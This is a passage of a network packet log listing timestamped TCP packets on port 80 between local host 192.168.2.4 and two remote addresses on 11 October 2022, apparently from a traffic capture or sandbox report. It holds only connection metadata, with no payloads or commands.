Oct 11, 2022 15:01:58.471097946 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.471121073 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.471148014 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.471205950 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.472240925 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.472280025 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.472306013 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.472312927 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.472341061 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.472353935 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.472361088 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.472902060 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.472956896 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.472958088 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.472990036 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.472997904 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.473040104 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.473050117 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.473050117 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.473084927 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.473088026 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.473109961 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.473120928 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.473794937 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.473829031 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.473861933 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.473860979 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.473887920 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.473887920 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.473908901 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.476423025 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.476449966 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.476473093 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.476499081 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.476519108 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.476520061 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.476557016 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.476597071 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.477426052 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.477453947 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.477477074 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.477494001 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.477494955 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.477516890 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.477530003 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478224039 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478254080 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478279114 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478291988 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478303909 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478312969 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478329897 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478332996 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478343964 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478353977 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478368044 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478373051 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478400946 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478621006 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478650093 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478676081 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478712082 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.478734016 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478776932 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.478805065 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.479098082 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.479125023 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.479151011 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.479163885 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.479177952 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.479192019 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.479192019 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.479196072 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.479219913 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.483032942 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.483069897 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.483086109 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.483098030 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.483283043 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.484540939 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484565973 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484586954 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484607935 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484630108 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484647036 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.484647036 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.484652042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484668016 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484705925 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.484715939 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484729052 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.484739065 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484761000 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.484781027 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.484781027 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.484807014 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.484814882 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485212088 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485233068 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485249996 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485296011 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.485296011 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.485301018 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485325098 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485342979 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485344887 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.485373974 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.485395908 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.485413074 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485429049 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.485527039 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.485955954 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.486092091 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.488508940 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.488531113 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.488548994 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.488558054 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.488652945 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.488718033 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.488996029 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489016056 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489032984 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489042997 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489083052 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.489119053 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.489461899 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489480972 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489528894 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.489564896 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489573002 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.489584923 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489603043 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489620924 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489624023 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.489624023 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.489634991 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.489639997 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.489665031 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.490618944 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.490638971 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.490652084 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.490664959 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.490745068 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.490746021 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.490951061 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.490969896 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.490988970 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.491007090 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.491020918 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.491049051 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.491049051 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.491058111 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.491096020 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.492027044 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.492046118 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.492114067 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.492197037 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.492222071 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.492254972 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.493501902 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.493522882 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.493541002 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.493561029 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.493594885 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.493619919 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.495160103 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.495184898 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.495207071 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.495232105 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.495254993 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.495276928 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.495281935 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.495294094 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.495315075 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.495331049 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.496459961 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.496484041 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.496505976 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.496530056 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.496551037 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.496561050 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.496573925 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.496588945 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.496599913 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.496608019 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.496618032 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.496639967 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.497319937 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.497359037 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.497376919 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.497395039 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.497422934 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.497467995 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.498656988 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.499114037 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.649008036 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.903132915 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.930324078 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:59.095309973 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:59.095345974 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:59.095419884 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:59.095463037 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:02:50.623629093 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:04:05.922554970 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:05.939724922 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:05.939945936 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:05.941225052 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:05.957961082 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.009396076 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.009435892 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.009582996 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.009628057 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.134025097 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.150805950 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417062998 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417105913 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417123079 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417140007 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417157888 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417174101 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417191982 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417208910 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417227030 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417243958 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417258024 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417258978 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.417273998 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417289972 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417306900 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417309999 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.417324066 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417331934 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.417341948 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417355061 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.417361021 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417375088 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.417382002 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.417393923 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.417412996 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.417428970 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434043884 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434068918 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434086084 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434103966 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434120893 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434138060 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434149027 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434154987 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434171915 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434181929 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434190989 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434207916 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434225082 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434231043 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434242010 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434253931 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434257984 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434272051 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434276104 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434293985 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434302092 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434310913 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434328079 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434330940 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434345961 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434355974 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434362888 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434380054 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434381962 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434396982 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434407949 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434412956 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434431076 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434432030 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434448957 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434457064 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434465885 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434483051 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434487104 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434499979 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434510946 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434518099 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434535027 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434537888 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434551954 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434566975 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434570074 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434586048 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434596062 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434602976 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434614897 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434621096 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.434643030 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.434659004 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.451956034 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.451997042 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452009916 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452022076 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452034950 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452052116 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452065945 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452079058 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452095985 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452112913 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452131987 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452148914 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452162981 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452166080 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452183962 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452200890 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452212095 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452218056 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452233076 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452235937 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452250004 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452254057 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452271938 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452276945 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452289104 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452306032 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452306986 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452323914 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452326059 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452342033 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452358007 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452359915 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452375889 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452377081 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452394962 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452410936 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452411890 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:06.452428102 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:06.452429056 CEST	80	49702	204.79.197.203	192.168.2.4
